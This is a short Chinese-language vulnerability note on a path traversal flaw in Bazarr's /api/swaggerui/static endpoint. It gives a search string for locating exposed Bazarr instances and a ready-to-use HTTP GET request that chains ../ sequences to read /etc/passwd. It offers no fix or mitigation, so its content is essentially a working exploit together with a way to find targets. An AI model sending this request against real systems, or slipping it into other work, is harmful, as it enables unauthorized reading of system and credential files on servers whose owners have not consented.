Bazarr swaggerui任意文件读取漏洞
一、漏洞简介
<font style="color:rgb(32, 32, 32);">Bazarr是一个配合Sonarr和Radarr使用的伴侣应用程序,它根据您的要求管理和下载字幕。您可以通过TV节目或电影定义您的偏好,Bazarr将为您处理一切。Bazarr v1.4.3及之前版本存在目录遍历导致任意文件读取漏洞,该漏洞源于/api/swaggerui/static组件未能正确处理../,导致攻击者能够利用该漏洞读取任意文件。</font>
二、影响版本
- Bazarr
三、资产测绘
"Bazarr"
四、漏洞复现
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close